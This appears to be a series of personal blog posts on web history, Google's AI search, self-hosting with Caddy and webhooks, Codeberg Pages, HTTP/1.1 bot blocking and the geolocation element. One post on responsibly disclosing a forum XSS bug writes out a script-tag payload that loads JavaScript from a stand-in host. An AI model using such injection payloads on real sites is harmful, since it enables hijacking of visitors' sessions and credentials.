Around 1995 or so, a high schooler named Matt Wright decided to launch a website that shared some basic website tools that he
programmed. Many of these were dead-simple, things like contact forms, guestbooks, and web counters.
…
OMG I remember Matt’s Script Archive. I taught myself Perl with (among other things) his scripts.
I took his Counter/ImageCounter script and adapted it into my own FireCounter, which stitched together (non-animated) GIFs of digits (which I made using a filter in Corel Photo-Paint, I
think) into the kinds of edgy hit counter I was into, back in the day.
This is a recreation. It probably looks better than the original!
Later, I even added parameter handling to allow the webmaster to specify a different set of digit images, and referrer detection so that it could track different sites:
each got its own text file with its count in it! For a while, a dozen or so of my friends had my counter visible on their Geocities and Angelfire pages!
I’m sure that my script had many, if not more, of the kinds of security vulnerabilities discussed in the linked article. But man, it felt like magic at the time!
The field-sizing property is coming to Firefox 152, making it available across all major engines. It allows
you to control the sizing behavior of elements with a default preferred size, such as form elements.
…
Sometimes a new CSS feature comes along and I immediately “get it”. Like: that’s a cool new feature, I can already see how it’ll save me time, or make things simpler, or improve
accessibility, or allow me to do something new.
Other times, like this one, I initially shrug. What’s the point?, I think…
…and then later in the very same day find occasion to wish it was already mainstream. Hah!
For 25 years, Google Search was built on a contract. The web provided the content – billions of pages, freely linked, freely crawled. In return, Google sent people back. The link
was the unit of exchange. It’s what made the Web thrive as an information system: you publish, Google indexes, users click through, and value flows back to the source. Win-win.
That contract is now broken. Generative UI doesn’t link to your article, necessarily. It absorbs your article, synthesizes it into a
widget, and presents it as Google’s own answer. Information agents don’t send users to websites. They deliver “synthesized updates” with maybe a link or two buried at the bottom.
The web was the scaffolding Google needed to build its index, to train its models, to accumulate the world’s information, and put ads next to it to get filthy rich. Now that the
content is inside the system, the scaffolding is no longer needed. Google is creating its own context.
Google thinks it no longer needs the Web to deliver answers. And it no longer needs ad slots to deliver ads. What it needs is you. Your emails, your files, your calendar,
your purchase history, your travel plans – all flowing into Spark, all building the richest possible picture of who you are and what you’re likely to click on. That’s exactly the
kind of personal context those auction models need to work. The prediction module in the prominence allocation framework doesn’t run on keywords. It runs on knowing you.
…
An excellent piece by Matthias Ott, discussing revelations from this year’s Google I/O. In particular, the imminent pivot of Google Search from its lifelong “query in, list of links
out” model to a wholesale “query in, LLM output out” one.
This isn’t just about putting AI output at the top of the search results, as I gather they do today, but about getting rid of search “results” entirely, and
running everything through the model.
To which Matthias wisely asks: well, how will ads work then? Google’s business model is based on mining your personal data and shoving ads in your face. Where do they go in a search
interface that it’s really a search but a “helpful” AI.
It turns out there’s a few approaches that Google seem to be considering, but what they’ve all got in common is the idea that marketers will be able to “influence” the LLM’s token
generation, perhaps by using an LLM of their own to decide whether you (based on everything Google knows about you) are worth marketing to, and how much they’ll pay to do so, and then
this input being “weighted” against competing advertisers and actual ingested data in order to feature advertiser-influenced content woven directly into the output of the LLM.
Superficially, this sounds a little like product placement, like you sometimes see in American-made TV shows and movies. You know, where one character says, of “I’m going to go get a
drink refill. You know you can get unlimited refills on any drink you want… and it’s free?”, and the next says “It’s a wonderful restaurant.”, while they’re sitting in Burger King.
Except this isn’t about saying “hey, people who watch this show are probably high and want a snack, let’s push our fast food their way”. It’s individualised.
It’s more like if the characters, knowing that your GMail account had a recent email about some test results, and your Google Calendar had an appointment tomorrow at the doctor, started
talking about a particular brand of medication to, y’know, put the idea into your head.
The future presented in Futurama was supposed to be a joke, right?
We’re not at the point of completely-customised TV shows – nor the injection of commercials into dreams – yet. But Google’s plans, which blur the already-grey boundaries between organic
and advertising content, are pretty insidious.
Assuming you’re in their ecosystem already, and possibly even if you’re not… Google may already be looking at your search terms, your calendar, your emails, your location and schedule,
who you communicate with and how often, which web pages you visit, which apps you use, where you spend money, etc. (Seriously: if you somehow haven’t begun de-googling already, what are
you waiting for?)… there’s a huge potential for misuse there.
But the arms race between people blocking or learning-to-ignore ads and advertisers trying to foist them upon us continues, and Google thinks this is an acceptable next step in
escalating that. Using an insane amount of energy to recycle other people’s work without crediting them, in order to mash up the result with information they know about you in order to
deliver you an unverifiable soup of words which might answer your question but with no clue how much or little commercial interest went into producing it, or by whom.
That’s some proper Darkest Timeline shit, right there.
You don’t need to take my nor Matthias’s word on it (although you should read his full post because it’s excellent): just look at the concept videos in Google’s blog post on the subject. You’ll also notice that almost-nowhere
in their demos do Google even hint at the possibility of linking-out to anybody else’s website: there’s like one “visit site” button that appears at the very end of
one of the flows, after the agent has done its things. Google is building a walled garden where they hope you’ll live, served by their AI butler on behalf of the companies
who pay Google to tell you about their products.
This morning I had a lovely meeting with Andreas Marakis, who’s researching the sociological impact of the Web of the 1990s on
people who experienced it first-hand.
Anyway: chatting to Andreas was great and it reminded me of quite how grateful I am to have gotten to experience a lot of these seminal technologies when they were at their newest and
most-experimental.
When it first appeared, Google Search was a breath of fresh air. Simple, powerful search that Just Worked. It’s little wonder that the phase “to Google” something became synonymous with
“to search for” something.
Somewhere, Google lost its way.1
Perhaps the latest example of that is the injection of AI into every search2:
I’ve been to the cinema a few times lately so I’ve seen the Google AI ad that inspired me to make this parody… a lot.
Music by Dead Tubes Foundation (click to unmute/mute).
Apparently the kids these days don’t “Google it”. At least, not in their colloquialisms: they’re still probably using the search engine.
We should turn the verb use of googling into an insult.
Example: “That’s so unbelievable it sounds like you googled it.”
I love this, and I’m absolutely going to start using it. “To Google” can absolutely transform from meaning “to search for, using a Web search engine” to meaning:
to seek knowledge in a lazy and convenient way, without regard for its accuracy
(“I Googled from a guy at the pub that 5G caused Covid”)
to acquire information that can’t accurately be sourced or verified
(“don’t quote me on that, though: I Googled it”)
to prefer an answer to a question that’s mildly more-convenient for the asker, even if getting it was ethically problematic
(“pass me the jump leads, I’m going to Google one of the hostages”)
DeGoogling is so… 2010s. Let’s make the 2020s the decade where we redefine Google as a verb, in a way that better represents what it means to continue to buy in to the
ever-increasingly toxic Google Search ecosystem.
2 Yes, I’m aware that some other search engines include AI summaries in results, too. But
they all seem easier to turn off… and I’m yet to see a cinema advertisement about the fact that they do it for anything other that Google Search.
Well this is a fun (and frustrating!) game. You’ll be presented with 20 (alleged) CSS properties, but some of them… are convincing-looking fakes! You’ve got 10 seconds to identify
whether each is real or not. Every few you get right increases the difficulty level, but also the score potential. How high can you score?
Me? Oh, I kept getting up into the “forbidden” level and then my brain would melt and I’d crash out. Quite proud of my last run, though:
Pushing to the main branch of my GitHub/Codeberg/wherever repo would send a webook to my server.
Upon receiving the webhook, my server would pull the latest changes2.
Using a wildcard certificate, my webserver automatically mounts each project at a subdomain matching its project name3.
Here’s what I came up with:
Step 1: webhook handler
I’m using Caddy as my webserver, because despite its considerable power and versatility it’s a breeze
to set up. To sort wildcard DNS later I’ll want to swap in a custom build, but to get started I just ran apt install caddy. Then I used apt install webhook
to install Adnan Hajdarević’s webhook endpoint, and tied the two together in my Caddyfile:
My static server’s called duckling.danq.me, so you’ll see that turn up a lot in these configs.
Then I created a webhook in a GitHub repository:
I generated a long random string to use as the secret, and kept a copy for later.
When you create a webhook in GitHub it immediately sends a test event, but it doesn’t quite look like a real push event so I pushed an inconsequential change to the repo
to trigger another. Once you’ve got a “real” one sent, you can re-send it via the “Recent Deliveries” tab as many times as you like, to help with testing.
Then, on the server, I checked-out a copy of the code (anonymously: this is a public repository so I don’t need keys to read from it anyway) and set up my /etc/webhook.conf to expect
these calls:
The trigger-rule directives ensure that (a) the secret key is correct (it uses a HMAC hash across the entire JSON request, so it prevents payload tampering too) and
(b) the event only triggers on pushes to the main branch. The execute-command specifies the Bash script I want to run when the webhook is triggered. The
pass-arguments-to-command configuration says to send the repo name on to that script.
Now all I needed to do was write the /var/www/github-push/webhook.sh Bash script so that it pulled the latest copy of the code when triggered:
#!/bin/bashcd/var/www/github-push/$1&&gitpull
I was able to test this by pushing inconsequential changes to my codebase and watching them get replicated down to my webserver. Neat!
Step 2: low-maintenance webserver
After pointing the DNS for *.static.duckling.danq.me at my static server, I set about configuring Caddy to be able to use DNS-01 challenges to get itself wildcard SSL
certificates4.
Caddy can’t do DNS-01 challenges out of the box, so you either need to write your own renewal script or compile Caddy with plugins corresponding to your DNS provider. My domains’ DNS
are managed by a mixture of AWS Route 53, Gandi, and Namecheap, so my xcaddy build step looked like this:
For Gandi and Namecheap I just need a personal access token or API key, respectively, but Route 53’s configuration is slightly more-involved: I needed to create a new user via IAM and
give it permission to write DNS TXT records for the appropriate hosted zone. Fortunately the guide for the
caddy-dns/route53 repo had an almost copy-pastable example.
I added the AWS access key and secret key as environment variables (like this!) into my
/etc/systemd/system/multi-user.target.wants/caddy.service service definition, and then told my Caddyfile to make use of them when renewing the wildcard certificate:
The {http.request.host.labels.4} refers to the fourth part of the domain name, when separated at the dots and counted from the right, so 0 = me, 1 =
danq, 2 = duckling, 3 = static, and 4 = the part that we’re interested in. So long as I don’t store any other directories in the
/var/www/github-push/ directory then this will simply map each subdomain onto its git repository name and return a 404 for any other request.
DNS-01 challenges are necessarily slower than HTTP-01/ALPN challenges, because they’re limited by DNS propogation, so it took a while before the
certificate was issued. I ran Caddy in the foreground to watch the logs while it did so:
I don’t yet know if this is going to be the future forever-home of my many static site side projects, but it’s certainly been the most-satisfying experiment to run so-far.
Footnotes
1 I’ve drifted away from selfhosting simple static sites lately because I’ve accidentally
broken them with configuration changes too many times! But I figured I’d be open to in-housing them again if I had a single simple architecture for them all, so I spun up a VPS and
gave it a go
2 Running a build script or some other static site generation tool is out of scope for
now, but I want to be able to confirm that it would be possible in the future.
3 It also needs to be possible for me to map other domain names to it, but that’s
a triviality.
4 It’s absolutely
possible to use tls { on_demand } to do this, but it’s better to use a wildcard certificate which can be pre-generated and doesn’t let people trick your
server into making ludicrous numbers of certificate requests by hammering random subdomain names.
Late to the party,1 I finally got around to experimentally moving a GitHub Pages-hosted static site to Codeberg. I wanted a low-risk site to try first, so I moved Beige Buttons, the site hosting my “90s PC turbo
button simulator” web component.
Ê
Mostly for my own benefit later, here’s the steps I took and the things I learned along the way:
Codeberg Pages is deployed from the pages branch. If there’s no build step to the static site, all you need to do is rename the
main branch to pages (and probably make it the default branch).2
The default URL is https://username.codeberg.page/repository.
You can use a custom domain by adding a .domains file that lists domains; if migrating from GitHub Pages you can just rename your CNAME file to
.domains.
You’ll need to tweak your DNSCNAME, ALIAS (or,
worst-case, A/AAAA) record to point at Codeberg Pages.3
Change propogation feels slightly slower than GitHub, but perfectly tolerable.
The one thing that’s causing me trouble is that Codeberg Pages’ CORS headers prevent people from hotlinking the Beige Buttons JS, so there are some projects for which this
wouldn’t be a suitable migration (issuesareraised). But for most static sites, it’d probably Just Work and seems to be a great alternative.
Two decades ago this month my friend Matt posted five predictions about the future of the world. I’ve revisited these predictions
twice since: ten years later and twenty years later, and “scored” his predictions both times.
I love that the Web’s memory (and the persistence of URLs) makes this kind of long-term conversation possible.
People being unwilling to discuss their wild claims later using the lack of discussion as evidence of widespread acceptance.
When people balance the new toilet roll one atop the old one’s tube.3
Come on! It would have been so easy!
Shellfish. Why would you eat that!?
People assuming my interest in computers and technology means I want to talk to them about cryptocurrencies.4
Websites that nag you to install their shitty app. (I know you have an app. I’m choosing to use your website. Stop with the banners!)
People who seem to only be able to drive at one speed.5
The assumption that the fact I’m “sharing” my partner is some kind of compromise on my part; a concession; something that I’d “wish away” if I could.
(It’s very much not.)
Brexit.
Wow, that was strangely cathartic.
Footnotes
1 I have a special pet hate for websites that require JavaScript to render their images.
Like… we’d had the<img>tag since 1993! Why are you throwing it away and replacing it with something objectively slower, more-brittle, and
less-accessible?
2 Or, worse yet, claiming
that my long, random password is insecure because it contains my surname. I get that composition-based password rules, while terrible (even when they’re correctly
implemented, which they’re often not), are a moderately useful model for people to whom you’d otherwise struggle to
explain password complexity. I get that a password composed entirely of personal information about the owner is a bad idea too. But there’s a correct way to do this, and it’s not “ban
passwords with forbidden words in them”. Here’s what you should do: first, strip any forbidden words from the password: you might need to make multiple passes. Second, validate the
resulting password against your composition rules. If it fails, then yes: the password isn’t good enough. If it passes, then it doesn’t matter that forbidden words
were in it: a properly-stored and used password is never made less-secure by the addition of extra information into it!
My recent post How an RM Nimbus Taught Me a Hacker Mentality kickstarted several conversations, and I’ve enjoyed talking to people about the “hacker
mindset” (and about old school computers!) ever since.1
Thinking “like a hacker” involves a certain level of curiosity and creativity with technology. And there’s a huge overlap between that outlook and the attitude required to
be a security engineer.
By way of example: I wrote a post for a Web forum2
recently. A feature of this particular forum is that (a) it has a chat room, and (b) new posts are “announced” to the chat room.
It’s a cute and useful feature that the chat room provides instant links to new topics.
The title of my latest post contained a HTML tag (because that’s what the post was talking about). But when the post got “announced” to the chat room… the HTML tag seemed to have
disappeared!
And this is where “hacker curiosity” causes a person to diverge from the norm. A normal person would probably just say to themselves “huh, I guess the chat room doesn’t show HTML
elements in the subjects of posts it announces” and get on with their lives. But somebody with a curiosity for the technical, like me, finds themselves wondering exactly
what went wrong.
It took only a couple of seconds with my browser’s debug tools to discover that my HTML tag… had actually been rendered to the page! That’s not good: it means that, potentially, the
combination of the post title and the shoutbox announcer might be a vector for an XSS attack. If I wrote a post with a title of, say, <script
src="//example.com/some-file.js"></script>Benign title, then the chat room would appear to announce that I’d written a post called “Benign title”, but anybody viewing it
in the chat room would execute my JavaScript payload3.
I reached out to an administrator to let them know. Later, I delivered a proof-of-concept: to keep it simple, I just injected an <img> tag into a post title and, sure
enough, the image appeared right there in the chat room.
Injecting an 88×31 seemed like a less-disruptive proof-of-concept than, y’know, alert('xss'); or something!
This didn’t start out with me doing penetration testing on the site. I wasn’t looking to find a security vulnerability. But I spotted something strange, asked
“what can I make it do?”, and exercised my curiosity.
Even when I’m doing something more-formally, and poking every edge of a system to try to find where its weak points are… the same curiosity still sometimes pays dividends.
And that’s why you need that mindset in your security engineers. Curiosity, imagination, and the willingness to ask “what can I make it do?”. Because if you don’t find the loopholes,
the bad guys will.
Footnotes
1 It even got as far as the school run, where I ended up chatting to another parent about
the post while our kids waited to be let into the classroom!
2 Remember forums? They’re still around, and – if you find one with the right group of
people – they’re still delightful. They represent the slower, smaller communities of a simpler Web: they’re not like Reddit or Facebook where the algorithm will always find something
more to “feed” you; instead they can be a place where you can make real human connections online, so long as you can deprogram yourself of your need to have an endless-scroll of
content and you’re willing to create as well as consume!
3 This, in turn, could “act as” them on the forum, e.g. attempting to steal their
credentials or to make them post messages they didn’t intend to, for example: or, if they were an administrator, taking more-significant actions!
Most of the traffic I get on this site is bots – it isn’t even close. And, for whatever reason, almost all of the bots are using HTTP1.1 while virtually all human traffic is using
later protocols.
I have decided to block v1.1 traffic on an experimental basis. This is a heavy-handed measure and I will probably modify my approach as I see the results.
…
# Return an error for clients using http1.1 or below - these are assumed to be bots@http-too-old{notprotocolhttp/2+notpath/rss.xml/atom.xml# allow feeds}respond@http-too-old400{body"Due to stupid bots I have disabled http1.1. Use more modern software to access this site"close}
This is quick, dirty, and will certainly need tweaking but I think it is a good enough start to see what effects it will have on my traffic.
…
A really interesting experiment by Andrew Stephens! And love that he shared the relevant parts of his Caddyfile: nice to see how elegantly this can be achieved.
I decided to probe his server with cURL:
~ curl --http0.9 -sI https://sheep.horse/ | head -n1
HTTP/2 200
~ curl --http1.0 -sI https://sheep.horse/ | head -n1
HTTP/1.0 400 Bad Request
~ curl --http1.1 -sI https://sheep.horse/ | head -n1
HTTP/1.1 400 Bad Request
~ curl --http2 -sI https://sheep.horse/ | head -n1
HTTP/2 200
Curiously, while his configuration blocks both HTTP/1.1 and HTTP/1.0, it doesn’t seem to block HTTP/0.9! Whaaa?
It took me a while to work out why this was. It turns out that cURL won’t do HTTP/0.9 over https:// connections. Interesting! Though it presumably wouldn’t have worked
anyway – HTTP/1.1 requires (and HTTP/1.0 permits) the Host: header, but HTTP/0.9 doesn’t IIRC, and sheep.horse definitely does require the Host: header (I tested!).
I also tested that my RSS reader FreshRSS was still able to fetch his content. I have it configured to pull not only the RSS feed, which is specifically allowed to bypass his
restriction, but – because his feed contains only summary content – I also have it fetch the linked page too in order to get the full content. It looks like FreshRSS is using HTTP/2 or
higher, because the content fetcher still behaves properly.
Andrew’s approach definitely excludes Lynx, which is a bit annoying and would make this idea a non-starter for any of my own websites. But it’s still an interesting experiment.
The <geolocation> element provides a button that, when activated, prompts the user for permission to access their location. Originally, it was designed as a
general <permission> element, but browser vendors indicated that implementing a “one-size-fits-all” element would be too complex. The result was a single-purpose
element, probably the first of several.
<geolocation><strong>Your browser doesn't support <geolocation>. Try Chrome 144+</strong></geolocation>
…
I’ve been waiting for this one. Given that “requesting permission to access a user’s location” has always required user intervention, at least to begin with, it makes
sense to me that it would exist as a form control, rather than just as a JavaScript API.
Implementing directly in HTML means that it degrades gracefully in the standard “if you don’t understand an element, simply render its contents” way that the Web always has. And
it’s really easy to polyfill support in for the new element so you can start using
it today.
My only niggle with <geolocation> is that it still requires JavaScript. It feels like a trick’s been missed, there. What I’d have really wanted would
have been <input type="geolocation">. This would e.g. renders as a button but when clicked (and permission granted) gets the user’s device location and fills the
field (presumably with a JSON object including any provided values, such as latitude, longitude, altitude, accuracy, provider, and so on). Such an element would still provide
all the same functionality of the new element, but would also be usable in a zero-JS environment, just like <input type="file">, <input
type="datetime-local"> and friends.
This is still a huge leap forward and I look forward to its more-widespread adoption. And meanwhile, I’ll be looking into integrating it into both existing applications that use it
and using it in future applications, by preference over the old API-driven approach. I’m grateful to Manuel for sharing what he’s learned!
Highlight of my workday was debugging an issue that turned out to be nothing like what the reporter had diagnosed.
The report suggested that our system was having problems parsing URLs with colons in the pathname, suggesting perhaps an encoding issue. It wasn’t until I took a deep dive into the logs
that I realised that this was a secondary characteristic of many URLs found in customers’ SharePoint installations. And many of those URLs get redirected. And SharePoint often uses
relative URLs when it sends redirections. And it turned out that our systems’ redirect handler… wasn’t correctly handling relative URLs.
It all turned into a hundred line automated test to mock SharePoint and demonstrate the problem… followed by a tiny two-line fix to the actual code. And probably the
most-satisfying part of my workday!
Have you ever wished there were more to the internet than the same handful of apps and sites you toggle between every day? Then you’re in for a treat.
Welcome to the indie web, a vibrant and underrated part of the internet,aesthetically evocative of the late 1990s and early 2000s. Here,
the focus is on personal websites, authentic self-expression, and slow, intentional exploration driven by curiosity and interest.
These kinds of sites took a backseat to the mainstream web around the advent of big social media platforms, butrecently the indie web has been experiencing a
revival, as more netizens look for connection outside the walled gardens created by tech giants. And with renewed interest comes a new generation of website
owner-operators, intent on reclaiming their online experience from mainstream social media imperatives of growth and profit.
…
I want to like this article. It draws attention to the indieweb, smolweb, independent modern personal web, or whatever you want to call it. It does so in a way that
inspires interest. And by way of example, it features several of my favourite retronauts. Awesome.
But it feels painfully ironic to read this article… on Substack!
Substack goes… let’s say half-way… to representing the opposite of what the indieweb movement is about! Sure, Substack isn’t Facebook or Twitter… but it’s still very much in
the same place as, say, Medium, in that it’s a place where you go if you want other people to be in total control of your Web presence.
The very things that the author praises of the indieweb – its individuality and personality, its freedom control by opaque corporate policies, its separation from the “same
handful of apps and sites you toggle between every day” – are exactly the kinds of things that Substack fails to provide.